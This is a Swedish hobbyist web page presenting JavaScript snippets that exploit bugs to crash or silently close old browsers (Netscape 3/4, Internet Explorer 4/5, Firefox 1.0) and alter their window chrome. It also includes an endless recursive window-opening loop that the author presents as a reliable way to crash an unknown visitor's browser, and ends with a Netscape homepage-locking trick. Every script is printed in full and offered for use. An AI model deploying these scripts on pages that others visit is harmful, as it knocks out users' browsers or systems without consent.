Till Startsidan

JAVASCRIPT SLÅR UT DE BÄSTA WEBBLÄSARNA

Om buggarna
Ändra webbläsarens utseende [Netscape 4]
Stäng webbläsarens fönster [Netscape 3; Netscape 4; Firefox 1.0]
Krascha webbläsaren [Netscape 4; Ger scriptfel i Netscape 3]
Krascha webbläsaren [Explorer 4]
Krascha webbläsaren [Explorer 5]
Döda webbläsaren [Många webbläsare]
Koda Netscape 3 & 4

Jag har tidigare skrivit flera script som med mycket simpla metoder lyckas krascha dem senaste versionerna av dem modernaste webbläsarna. Hittills har jag hittat buggar där man med JavaScript kan krascha:
 • Netscape 3
 • Netscape 4
 • Internet Explorer 4
 • Internet Explorer 5
 • Firefox 1.0
Det hela styrs alltså med hjälp av språket JavaScript (som nästan alla internetanvändares webbläsare använder). Din webbläsare stödjer JavaScript.

Vissa script här kraschar webbläsaren medan andra lyckas stänga ner webbläsarfönstret utan att du som användare varnas om detta. Det finns även ett script som kan ändra webbläsarens utseende (t.ex. genom att dölja eller visa webbläsarmenyn eller statusbar).
Vilka script som fungerar med vilka webbläsare framgår nedan.

Att testa scripten är helt ofarligt, men eftersom din webbläsare kan stängas ner av scriptet så rekommenderas du att bookmarka denna sida så du kan hitta tillbaka hit när webbläsaren kraschat.

Något som kan verka ganska förvånande är att den bugg som jag en gång hittade som kraschade Netscape 3 senare även fanns kvar i Netscape 4, och 9 år efter att Netscape 3 släpptes (1996) finns exakt samma bugg kvar i Firefox (som bygger på Netscapes kod).

Tänk på att senare versioner av respektive webbläsare kan ha rättats till så att buggarna inte fungerar.

Jag är underförstådd med detta...
Scripten på denna sida kan utföra handlingar som kan vara oönskade. För att ingen av misstag ska trycka på länkarna utan vetskap om vad scripten gör så kommer scripten inte kunna aktiveras om inte rutan här bredvid kryssats i. För att kunna använda scripten, kryssa helt enkelt i rutan.

Ändra webbläsarens utseende [Netscape 4]
Webbläsarens utseende ska (som det från början var tänkt) bara kunna ändras av användaren, men icke sa nicke, nu kan alla sitta och ändra sina besökares webbläsare.
Om du vill testa att ändra ditt fönster nu så kan du trycka på knappen nedan.


För de JavaScript-kunniga så är scriptet för buggen:

<SCRIPT LANGUAGE="javascript">
<!--
//  Scriptet som kan ändra webbläsarens utseende - NN4.
//  Ange attributen som det nyformaterade fönstret ska ha.

window.open("","_top","toolbar=yes,location=yes,directories=yes,status=yes,menubar=yes,scrollbars=yes,resizable=yes");

//-->
</SCRIPT>Stäng webbläsarens fönster [Netscape 3; Netscape 4; Firefox 1.0]
I Netscape så kan du inte bara redigera besökarens fönster, du kan även stänga den helt fullständigt. Dvs, det fönster som besökaren använder för att besöka din sida stängs. Med Explorer så tillfrågas besökaren om man vill stänga fönstret eller inte.
Ivrig på att testa?
Tryck på knappen nedan för att stänga din webbläsare.


Om du kan JavaScript så finns scriptets kod här:

<SCRIPT LANGUAGE="javascript">
<!--
//  Scriptet som stänger webbläsaren - NN3, NN4, Firefox 1.0.

window.top.open("","_top");  // Gör så att fönstret blir "_top", då behövs inte någon förfrågning när fönstret stängs.
window.top.close();      // Stänger fönstret (nu utan förfrågning).

//-->
</SCRIPT>Krascha webbläsaren [Netscape 4; Ger scriptfel i Netscape 3]
En sak som kan vara otroligt irriterande är då man använder nedanstående script, som kraschar webbläsaren.
Netscape 3 får dock endast tre felmeddelanden


Här är scriptet till detta irrierande script.

<SCRIPT LANGUAGE="javascript">
<!--
//  Kraschar webbläsaren - NN4.
//  Netscape 3-användare får tre felmeddelanden

y="ÿ"

//-->
</SCRIPT>Krascha webbläsaren [Explorer 4]
Denna bugg kraschar Internet Explorer 4. När scriptet aktiveras så kraschar webbläsaren och fönstret stängs.

<SCRIPT LANGUAGE="javascript">
<!--
//  Kraschar webbläsaren - IE4.
//  Scriptet skriver ut en text till en SELECT-tagg,
//  och eftersom en sådan kanske inte finns på sidan så skapas
//  en sida med denna tagg som sedan scriptet skriver till

document.open();
document.write("<HTML><HEAD><TITLE></TITLE></HEAD><BODY><FORM><SELECT><OPTION VALUE='' SELECTED></OPTION></SELECT></FORM><SCRIPT>document.forms[0].elements[0].options[document.forms[0].elements[0].length-1].text=document.forms[0].elements[0].options[document.forms[0].elements[0].selectedIndex].text;</SCRIPT></BODY></HTML>")
document.close();

//-->
</SCRIPT>Krascha webbläsaren [Explorer 5]
Denna bugg kraschar Internet Explorer 5. När scriptet aktiveras så kraschar webbläsaren och fönstret stängs.

<SCRIPT LANGUAGE="javascript">
<!--
//  Kraschar webbläsaren - IE5.
//  Scriptet skapar en sida med en bild, som precis när bilden
//  skapats kraschar webbläsaren.
//  Glöm inte att "bild.gif" måste finnas i den katalog som filen med scriptet finns i.

document.open();
document.write("<HTML><HEAD><TITLE></TITLE></HEAD><BODY><IMG NAME=\"a\" SRC=\"bild.gif\" onLoad=\"document.images['a'].src='bild.gif';\"></BODY></HTML>");
document.close();

//-->
</SCRIPT>Döda webbläsaren [Många webbläsare]
Detta script tar kål på de flesta webbläsare, fast är trots detta inte en bugg, utan ett script som öppnar oändligt med fönster. Detta är alltså ingen bugg, fast att inget inbyggt skydd finns hos webbläsarna kan ju verka ganska idiotiskt. Det scriptet gör är att hela tiden öppna nya fönster, som i sin tur också öppnar nya fönster, ända tills webbläsaren kanske kraschar. Detta fungerar med väldigt många webbläsare och är bland de säkraste sätten att krascha en okänd webbläsare.
Ibland kan hela datorn krascha, ibland bara webbläsaren.


Koden för detta script är:

<SCRIPT LANGUAGE="javascript">
<!--
//  Öppna oändligt med fönster.

while (1==1)
window.open("javascript:while (1==1)window.open('',Math.round(Math.random()*1000000000),'')",Math.round(Math.random()*1000000000),"");

//-->
</SCRIPT>

Tack vare dessa buggar kan man koda Netscape 3 och 4 på sin egen hårddisk. Dock så kan man ta sig förbi om man är en van användare som kan mycket om datorer, men skyddet är perfekt för den med små barn som "chattar" hela dagarna. ;)
För att koda en sida gör du så här (namnen nedan är för den engelska versionen, det första som står för Netscape 4 och det andra för Netscape 3):
 1. Gå upp i menyn "Edit"/"Options".
 2. Välj "Preferences..."/"General Preferences...".
 3. Skriv din genererade kod som skapas i fältet nedan i det stora fältet (under "Preferences..."):
 4. Se till att "Home Page"/"Home Page Location" är valt.
 5. Tryck på "OK", allt är färdigt.

Om någon har kodat din Netscape eller om du har glömt din kod kan du knäcka koden så här:

 1. Sök efter filen "prefs.js" på din dator (finns någonstans under katalogen "Netscape").
 2. Leta upp raden "user_pref("browser.startup.homepage", "" och ändra ALLT som står efter ovanstående textremsa på den raden till "file:///C:/".
 3. Spara nu filen (OBS: låt Netscape vara stängt medan du har filen "prefs.js" öppen).

Det är alltså i ovanstående fil som din kod kan läsas av en duktig dataanvändare.


Har du kodat Netscape men sedan vill ta bort kodningen (och kan den nuvarande koden) så behöver du bara starta Netscape och ändra startsida till vad som helst.


Tillbaka till alla scripten


Copyright © Omid Rouhani 1997-2022; Alla rättigheter reserverade.
Guider: [ HTML guide ] - [ JavaScript guide ] - [ DHTML guide ] - [ Perl guide ] - [ Sitemap ]